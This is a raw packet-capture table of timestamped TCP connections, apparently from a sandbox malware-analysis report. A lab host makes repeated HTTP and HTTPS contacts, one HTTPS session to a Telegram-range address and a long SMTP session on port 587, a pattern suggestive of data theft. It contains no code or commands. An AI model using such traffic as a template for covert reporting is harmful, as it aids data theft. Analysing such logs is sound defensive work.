                                              Sep 26, 2024 09:19:29.445355892 CEST44349164188.114.97.3192.168.2.22
                                              Sep 26, 2024 09:19:29.445488930 CEST49164443192.168.2.22188.114.97.3
                                              Sep 26, 2024 09:19:29.445923090 CEST49164443192.168.2.22188.114.97.3
                                              Sep 26, 2024 09:19:29.462188959 CEST4916280192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:29.467304945 CEST8049162193.122.130.0192.168.2.22
                                              Sep 26, 2024 09:19:29.467417002 CEST4916280192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:29.485241890 CEST4916580192.168.2.22132.226.247.73
                                              Sep 26, 2024 09:19:29.490550995 CEST8049165132.226.247.73192.168.2.22
                                              Sep 26, 2024 09:19:29.490608931 CEST4916580192.168.2.22132.226.247.73
                                              Sep 26, 2024 09:19:29.490706921 CEST4916580192.168.2.22132.226.247.73
                                              Sep 26, 2024 09:19:29.495477915 CEST8049165132.226.247.73192.168.2.22
                                              Sep 26, 2024 09:19:30.178728104 CEST8049165132.226.247.73192.168.2.22
                                              Sep 26, 2024 09:19:30.232368946 CEST49166443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:30.232470036 CEST44349166188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:30.232542038 CEST49166443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:30.232830048 CEST49166443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:30.232860088 CEST44349166188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:30.391808987 CEST8049165132.226.247.73192.168.2.22
                                              Sep 26, 2024 09:19:30.394685984 CEST4916580192.168.2.22132.226.247.73
                                              Sep 26, 2024 09:19:30.698385954 CEST44349166188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:30.701658964 CEST49166443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:30.701731920 CEST44349166188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:30.835622072 CEST44349166188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:30.835736990 CEST44349166188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:30.835845947 CEST49166443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:30.836256027 CEST49166443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:31.267055988 CEST4916780192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:31.273471117 CEST8049167193.122.130.0192.168.2.22
                                              Sep 26, 2024 09:19:31.273541927 CEST4916780192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:31.273746014 CEST4916780192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:31.279247046 CEST8049167193.122.130.0192.168.2.22
                                              Sep 26, 2024 09:19:31.730346918 CEST8049167193.122.130.0192.168.2.22
                                              Sep 26, 2024 09:19:31.753818035 CEST49168443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:31.753849983 CEST44349168188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:31.753900051 CEST49168443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:31.754297972 CEST49168443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:31.754313946 CEST44349168188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:31.939692020 CEST4916780192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:32.218127966 CEST44349168188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:32.221108913 CEST49168443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:32.221124887 CEST44349168188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:32.367609978 CEST44349168188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:32.367714882 CEST44349168188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:32.367933989 CEST49168443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:32.368870974 CEST49168443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:32.385329962 CEST4916780192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:32.390687943 CEST8049167193.122.130.0192.168.2.22
                                              Sep 26, 2024 09:19:32.391993999 CEST4916780192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:32.411257029 CEST4916980192.168.2.22132.226.8.169
                                              Sep 26, 2024 09:19:32.417282104 CEST8049169132.226.8.169192.168.2.22
                                              Sep 26, 2024 09:19:32.417346954 CEST4916980192.168.2.22132.226.8.169
                                              Sep 26, 2024 09:19:32.417438984 CEST4916980192.168.2.22132.226.8.169
                                              Sep 26, 2024 09:19:32.423224926 CEST8049169132.226.8.169192.168.2.22
                                              Sep 26, 2024 09:19:33.318089962 CEST8049169132.226.8.169192.168.2.22
                                              Sep 26, 2024 09:19:33.332324028 CEST49170443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:33.332376003 CEST44349170188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:33.332439899 CEST49170443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:33.332834005 CEST49170443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:33.332848072 CEST44349170188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:33.527750015 CEST8049169132.226.8.169192.168.2.22
                                              Sep 26, 2024 09:19:33.527946949 CEST4916980192.168.2.22132.226.8.169
                                              Sep 26, 2024 09:19:33.818011999 CEST44349170188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:33.821438074 CEST49170443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:33.821456909 CEST44349170188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:33.963834047 CEST44349170188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:33.963969946 CEST44349170188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:33.964016914 CEST49170443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:33.964555025 CEST49170443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:33.980979919 CEST4916980192.168.2.22132.226.8.169
                                              Sep 26, 2024 09:19:33.986181974 CEST8049169132.226.8.169192.168.2.22
                                              Sep 26, 2024 09:19:33.986244917 CEST4916980192.168.2.22132.226.8.169
                                              Sep 26, 2024 09:19:34.008749962 CEST4917180192.168.2.22158.101.44.242
                                              Sep 26, 2024 09:19:34.013578892 CEST8049171158.101.44.242192.168.2.22
                                              Sep 26, 2024 09:19:34.013638973 CEST4917180192.168.2.22158.101.44.242
                                              Sep 26, 2024 09:19:34.013765097 CEST4917180192.168.2.22158.101.44.242
                                              Sep 26, 2024 09:19:34.018505096 CEST8049171158.101.44.242192.168.2.22
                                              Sep 26, 2024 09:19:35.386447906 CEST8049171158.101.44.242192.168.2.22
                                              Sep 26, 2024 09:19:35.401029110 CEST49172443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:35.401091099 CEST44349172188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:35.401145935 CEST49172443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:35.401443958 CEST49172443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:35.401463032 CEST44349172188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:35.590096951 CEST4917180192.168.2.22158.101.44.242
                                              Sep 26, 2024 09:19:35.884170055 CEST44349172188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:35.887286901 CEST49172443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:35.887326002 CEST44349172188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:36.028742075 CEST44349172188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:36.028863907 CEST44349172188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:36.028918982 CEST49172443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:36.029406071 CEST49172443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:36.045855045 CEST4917180192.168.2.22158.101.44.242
                                              Sep 26, 2024 09:19:36.050939083 CEST8049171158.101.44.242192.168.2.22
                                              Sep 26, 2024 09:19:36.050992966 CEST4917180192.168.2.22158.101.44.242
                                              Sep 26, 2024 09:19:36.067742109 CEST4917380192.168.2.22132.226.8.169
                                              Sep 26, 2024 09:19:36.073045015 CEST8049173132.226.8.169192.168.2.22
                                              Sep 26, 2024 09:19:36.073096991 CEST4917380192.168.2.22132.226.8.169
                                              Sep 26, 2024 09:19:36.073292971 CEST4917380192.168.2.22132.226.8.169
                                              Sep 26, 2024 09:19:36.078071117 CEST8049173132.226.8.169192.168.2.22
                                              Sep 26, 2024 09:19:37.890122890 CEST8049173132.226.8.169192.168.2.22
                                              Sep 26, 2024 09:19:37.909267902 CEST49174443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:37.909297943 CEST44349174188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:37.909370899 CEST49174443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:37.909872055 CEST49174443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:37.909883022 CEST44349174188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:38.095905066 CEST8049173132.226.8.169192.168.2.22
                                              Sep 26, 2024 09:19:38.095973969 CEST4917380192.168.2.22132.226.8.169
                                              Sep 26, 2024 09:19:38.386639118 CEST44349174188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:38.399437904 CEST49174443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:38.399454117 CEST44349174188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:38.547068119 CEST44349174188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:38.547168970 CEST44349174188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:38.547208071 CEST49174443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:38.547625065 CEST49174443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:38.565224886 CEST4917380192.168.2.22132.226.8.169
                                              Sep 26, 2024 09:19:38.570389032 CEST8049173132.226.8.169192.168.2.22
                                              Sep 26, 2024 09:19:38.570477009 CEST4917380192.168.2.22132.226.8.169
                                              Sep 26, 2024 09:19:38.624629974 CEST4917580192.168.2.22158.101.44.242
                                              Sep 26, 2024 09:19:38.629430056 CEST8049175158.101.44.242192.168.2.22
                                              Sep 26, 2024 09:19:38.629497051 CEST4917580192.168.2.22158.101.44.242
                                              Sep 26, 2024 09:19:38.634649038 CEST4917580192.168.2.22158.101.44.242
                                              Sep 26, 2024 09:19:38.639511108 CEST8049175158.101.44.242192.168.2.22
                                              Sep 26, 2024 09:19:39.532187939 CEST8049175158.101.44.242192.168.2.22
                                              Sep 26, 2024 09:19:39.547167063 CEST49176443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:39.547261953 CEST44349176188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:39.547353983 CEST49176443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:39.547683001 CEST49176443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:39.547717094 CEST44349176188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:39.739985943 CEST4917580192.168.2.22158.101.44.242
                                              Sep 26, 2024 09:19:40.009524107 CEST44349176188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:40.012712002 CEST49176443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:40.012765884 CEST44349176188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:40.147774935 CEST44349176188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:40.147967100 CEST44349176188.114.96.3192.168.2.22
                                              Sep 26, 2024 09:19:40.148019075 CEST49176443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:40.148473024 CEST49176443192.168.2.22188.114.96.3
                                              Sep 26, 2024 09:19:40.164752007 CEST4917580192.168.2.22158.101.44.242
                                              Sep 26, 2024 09:19:40.170172930 CEST8049175158.101.44.242192.168.2.22
                                              Sep 26, 2024 09:19:40.170226097 CEST4917580192.168.2.22158.101.44.242
                                              Sep 26, 2024 09:19:40.188426971 CEST4917780192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:40.194562912 CEST8049177193.122.130.0192.168.2.22
                                              Sep 26, 2024 09:19:40.194610119 CEST4917780192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:40.194757938 CEST4917780192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:40.199491024 CEST8049177193.122.130.0192.168.2.22
                                              Sep 26, 2024 09:19:40.650068045 CEST8049177193.122.130.0192.168.2.22
                                              Sep 26, 2024 09:19:40.666199923 CEST49178443192.168.2.22188.114.97.3
                                              Sep 26, 2024 09:19:40.666235924 CEST44349178188.114.97.3192.168.2.22
                                              Sep 26, 2024 09:19:40.666287899 CEST49178443192.168.2.22188.114.97.3
                                              Sep 26, 2024 09:19:40.666698933 CEST49178443192.168.2.22188.114.97.3
                                              Sep 26, 2024 09:19:40.666712046 CEST44349178188.114.97.3192.168.2.22
                                              Sep 26, 2024 09:19:40.847318888 CEST4917780192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:41.120532990 CEST44349178188.114.97.3192.168.2.22
                                              Sep 26, 2024 09:19:41.124633074 CEST49178443192.168.2.22188.114.97.3
                                              Sep 26, 2024 09:19:41.124644995 CEST44349178188.114.97.3192.168.2.22
                                              Sep 26, 2024 09:19:41.256162882 CEST44349178188.114.97.3192.168.2.22
                                              Sep 26, 2024 09:19:41.256263018 CEST44349178188.114.97.3192.168.2.22
                                              Sep 26, 2024 09:19:41.256345987 CEST49178443192.168.2.22188.114.97.3
                                              Sep 26, 2024 09:19:41.257020950 CEST49178443192.168.2.22188.114.97.3
                                              Sep 26, 2024 09:19:41.273241043 CEST4917780192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:41.278507948 CEST8049177193.122.130.0192.168.2.22
                                              Sep 26, 2024 09:19:41.280991077 CEST4917780192.168.2.22193.122.130.0
                                              Sep 26, 2024 09:19:41.289381981 CEST49179443192.168.2.22149.154.167.220
                                              Sep 26, 2024 09:19:41.289410114 CEST44349179149.154.167.220192.168.2.22
                                              Sep 26, 2024 09:19:41.289470911 CEST49179443192.168.2.22149.154.167.220
                                              Sep 26, 2024 09:19:41.289855957 CEST49179443192.168.2.22149.154.167.220
                                              Sep 26, 2024 09:19:41.289872885 CEST44349179149.154.167.220192.168.2.22
                                              Sep 26, 2024 09:19:41.901786089 CEST44349179149.154.167.220192.168.2.22
                                              Sep 26, 2024 09:19:41.901868105 CEST49179443192.168.2.22149.154.167.220
                                              Sep 26, 2024 09:19:41.906601906 CEST49179443192.168.2.22149.154.167.220
                                              Sep 26, 2024 09:19:41.906616926 CEST44349179149.154.167.220192.168.2.22
                                              Sep 26, 2024 09:19:41.906923056 CEST44349179149.154.167.220192.168.2.22
                                              Sep 26, 2024 09:19:41.909768105 CEST49179443192.168.2.22149.154.167.220
                                              Sep 26, 2024 09:19:41.951422930 CEST44349179149.154.167.220192.168.2.22
                                              Sep 26, 2024 09:19:42.145571947 CEST44349179149.154.167.220192.168.2.22
                                              Sep 26, 2024 09:19:42.145649910 CEST44349179149.154.167.220192.168.2.22
                                              Sep 26, 2024 09:19:42.145701885 CEST49179443192.168.2.22149.154.167.220
                                              Sep 26, 2024 09:19:42.149631977 CEST49179443192.168.2.22149.154.167.220
                                              Sep 26, 2024 09:19:58.594995022 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:19:58.600040913 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:19:58.600147009 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:19:59.252964020 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:19:59.253278971 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:19:59.259113073 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:19:59.427478075 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:19:59.506918907 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:19:59.511867046 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:19:59.680176973 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:19:59.899851084 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:19:59.899930000 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:00.152595043 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:00.344718933 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:00.520339966 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:00.520466089 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:00.520503044 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:00.520528078 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:00.521472931 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:00.521518946 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:00.608530998 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:00.687148094 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:00.692101002 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:00.859406948 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:00.921113014 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:00.926233053 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:01.093318939 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:01.094230890 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:01.099101067 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:01.266799927 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:01.267247915 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:01.272248030 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:01.439908981 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:01.440233946 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:01.445061922 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:01.615153074 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:01.615422010 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:01.620310068 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:01.824177980 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:01.824611902 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:01.830523014 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:01.997776031 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:01.998595953 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:01.998691082 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:01.998780012 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:01.998848915 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.002430916 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.004245043 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.004275084 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.004303932 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.004313946 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.004347086 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.004359961 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.009177923 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.009242058 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.312999010 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.340157986 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.340329885 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.971997023 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.972095013 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.972136021 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.973608971 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.974606991 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.974637032 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.974664927 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.974879980 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.974906921 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.974930048 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.974958897 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.977108002 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.977137089 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.977165937 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.977212906 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.979635000 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.979695082 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.979921103 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.979948997 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.979969978 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.979975939 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.980004072 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.980009079 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.980036020 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.980055094 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.982039928 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.982091904 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.982103109 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.982131958 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.982156038 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.982178926 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.982202053 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.982251883 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.984584093 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.984611988 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.984656096 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:02.984858036 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.984909058 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.984965086 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.985404015 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.987080097 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.987107992 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.987242937 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.987292051 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:02.989794016 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.067409039 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.067720890 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.072367907 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.072488070 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.072622061 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.072686911 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.072823048 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.072850943 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.072925091 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.072952986 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.072981119 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.073029041 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.073055983 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.073082924 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.073108912 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.073134899 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.073162079 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.073189974 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.181853056 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.182137012 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.186806917 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.186866999 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.186894894 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.186922073 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.186975002 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187002897 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187028885 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187081099 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187129974 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187156916 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187184095 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187232971 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187261105 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187287092 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187313080 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187340021 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187366009 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187417984 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187474012 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187501907 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187534094 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187561035 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187587976 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187613010 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187659025 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187685966 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187712908 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187738895 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.187875032 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.188211918 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.193301916 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193358898 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193408012 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193435907 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193464041 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193495035 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193551064 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193579912 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193607092 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193736076 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193763018 CEST58749180217.12.218.219192.168.2.22
